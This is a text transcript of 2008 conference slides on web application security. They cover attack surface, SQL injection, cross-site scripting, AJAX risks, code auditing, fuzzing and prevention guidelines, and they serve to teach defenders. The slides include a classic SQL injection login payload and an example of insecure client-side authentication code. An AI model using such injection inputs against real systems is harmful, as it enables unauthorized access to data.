COMPUTER INFORMATION TECHNOLOGY AT NKU
Download
Report
Transcript COMPUTER INFORMATION TECHNOLOGY AT NKU
Application Security through a
Hacker’s Eyes
James Walden
Northern Kentucky University
[email protected]
October 3, 2008
IMI Security Symposium
Why Do Hackers Target Web Apps?
October 3, 2008
IMI Security Symposium
Attack Surface
A system’s attack
surface consists of
all of the ways an
adversary can enter
the system.
Merchant’s Bank Building
October 3, 2008
IMI Security Symposium
Defender’s View of Attack Surface
web server
firewall
wireless
VPN
October 3, 2008
IMI Security Symposium
Firewalls don’t protect Web Apps
telnet
Firewall
ftp
Application
Web
Client
HTTP Traffic
October 3, 2008
Web
Server
Port 80
IMI Security Symposium
Application
Database
Server
SSL won’t stop injection attacks, XSS
telnet
Firewall
ftp
Application
Web
Client
HTTPS Traffic
October 3, 2008
Web
Server
Port 443
IMI Security Symposium
Application
Database
Server
Revised View of Attack Surface
external
web apps
external
web server
firewall
VPN
wireless
October 3, 2008
database
IMI Security Symposium
Intranet Security Assumptions
Since the firewall protects you
Patches don’t have to be up to date.
Passwords don’t have to be strong.
There’s no need to be careful when you code.
There’s no need to audit your source code.
There’s no need to run penetration tests.
But do your users have web browsers?
October 3, 2008
IMI Security Symposium
Javascript Malware controls Clients
Intranet
telnet
Firewall
Main
Server
ftp
Web
Server
(Javascript
malware)
Web
Client
HTTP Traffic
Port 80
October 3, 2008
IMI Security Symposium
Wiki
Group
Server
Java can see your real IP
address behind NAT router.
Javascript can scan your
intranet behind NAT router.
October 3, 2008
IMI Security Symposium
Sources of Javascript Malware
1. Evil web site owner inserts in page.
2. Attacker inserts malware into defaced page.
3. Attacker inserts malware into a public
comment or forum post (stored XSS.)
4. Attacker creates link that causes web site to
echo malware to user (reflected XSS.)
October 3, 2008
IMI Security Symposium
Re-revised View of Attack Surface
external
web server
external
web apps
internal
web apps
firewall
VPN
wireless
October 3, 2008
database
IMI Security Symposium
internal web
servers
Web Applications
external
web server
external
web apps
internal web
apps
firewall
VPN
wireless
October 3, 2008
database
IMI Security Symposium
internal web
servers
Web Application Vulnerabilities
Input-based Security Problems
– Injection Flaws
– Insecure Remote File Inclusion
– Unvalidated Input
Authentication and Authorization
– Authentication
– Access Control
– Cross-Site Attacks
Other Bugs
– Error Handling and Information Leakage
– Insecure Storage
– Insecure Communications
October 3, 2008
IMI Security Symposium
SQL Injection
1.
2.
3.
4.
5.
6.
App sends form to user.
Attacker submits form
with SQL exploit data.
Application builds string
with exploit data.
Application sends SQL
query to DB.
DB executes query,
including exploit, sends
data back to application.
Application returns data to
user.
Attacker
User ‘ or 1=1-Pass
Firewall
Web Server
October 3, 2008
IMI Security Symposium
DB Server
Cross-Site Scripting
Web Server
Attacker
User
3. XSS Attack
7. Browser runs
injected code.
4. User clicks on XSS link.
October 3, 2008
IMI Security Symposium
Evil site saves ID.
Web Application Attack Surface
cookies
form inputs
HTTP headers
URLs
October 3, 2008
IMI Security Symposium
Traditional Web Applications
HTTP Request (form submission)
User waits
Server processing
HTTP Response (new web page)
User interaction
HTTP Request (form submission)
Server processing
User waits
HTTP Response (new web page)
October 3, 2008
IMI Security Symposium
AJAX
Asynchronous Javascript and XML
User interacts with client-side
Javascript.
Javascript makes asynchronous
requests to server for data.
Continues to allow user to interact
with application.
Updates when receives encoded
data from server.
October 3, 2008
IMI Security Symposium
AJAX Applications
Client-side
Code
HTTP request (asynchronous)
User interaction
User interaction
HTTP Response (data)
partial update
partial update
HTTP request (asynchronous)
HTTP Response (data)
Server processing
HTTP request (asynchronous)
User interaction
partial update
HTTP Response (data)
partial update
October 3, 2008
Server processing
IMI Security Symposium
Server processing
Example Client-side Code
var auth = checkPassword(user, pass);
if (auth == false) {
alert(‘Authentication failed.’);
return;
}
var itemPrice = getPrice(itemID);
debitAccount(user, itemPrice);
downloadItem(itemID);
October 3, 2008
IMI Security Symposium
AJAX Application Attack Surface
cookies
client-side
code
form inputs
client-side
state
HTTP headers
URLs
October 3, 2008
server API
IMI Security Symposium
client-side
data
transforms
Drilling Down: Mapping the Application
1. Visible Content
1. Spider the site.
2. Browse site while using intercepting proxy.
2. Hidden Content
1.
2.
3.
4.
5.
Unlinked sections of site.
Backup copies of live files.
Configuration and include files.
Source code.
Log files.
October 3, 2008
IMI Security Symposium
Entry Points
For each resource found, identify inputs:
Additional path parameters
Query string
POST parameters
Cookies
HTTP headers
October 3, 2008
IMI Security Symposium
Application Feature Vulnerability Map
Database interaction
Displays user-supplied
data
Error messages
File upload/download
Login
October 3, 2008
SQL injection.
Cross-site scripting.
Information leakage.
Path traversal.
Authentication, session
management, access
control flaws.
IMI Security Symposium
Code Auditing
Why?
Find vulnerabilities faster than testing.
Find different vulnerabilities than testing.
What?
Identify modules of high business risk.
Use static analysis to find common vulnerabilities.
Manually review code + static analysis results.
Who?
Developers, security team, outside auditors.
When?
On a regular basis, at least once before release.
October 3, 2008
IMI Security Symposium
Static Analysis
Automated assistance for code auditing
Speed: review code faster than humans can
Accuracy: hundreds of secure coding rules
Tools
Results
October 3, 2008
IMI Security Symposium
•
•
•
•
•
Coverity
FindBugs
Fortify
Klocwork
Ounce Labs
Fuzz Testing
Fuzz testing consists of
Sending unexpected input.
Monitoring for exceptions.
October 3, 2008
IMI Security Symposium
Monitoring for Exceptions
Application mapping
Response code
Response size
Presence of string
“not authorized”
Password guessing
Response code
Response size
Presence of string
“login incorrect”
October 3, 2008
IMI Security Symposium
Prevention Guidelines
1.
2.
3.
4.
5.
6.
7.
8.
Use a standard, secure authentication scheme.
Check access control on every transaction.
Avoid using interpreters where possible.
Don’t leak sensitive information in error pages.
Encrypt sensitive data in transit and on disk.
Encode user data in output.
Don’t trust any data from the client.
Validate all input.
October 3, 2008
IMI Security Symposium
Input Validation
Blacklist: reject known bad input
Reject input matching list of bad strings/patterns.
Accept all other input.
Vulnerable to encoding attacks.
Whitelist: accept known good input
Accept input matching list of good strings/patterns.
Reject all other input.
Highly effective, but not always feasible.
October 3, 2008
IMI Security Symposium
1.
2.
Visible Content
1.
Linked URLs.
2.
Authenticated URLs.
Hidden Content
1.
Unlinked sections of site.
2.
Backup copies of live files.
3.
Configuration/include files.
4.
Source code.
5.
Log files.
cookies
client-side
code
form inputs
client-side
state
HTTP headers
URLs
external
web server
external
web apps
internal
web apps
server API
A site’s attack surface
firewall
VPN
wireless
October 3, 2008
database
internal web
servers
IMI Security Symposium
client-side
data
transforms
is nearly fractal.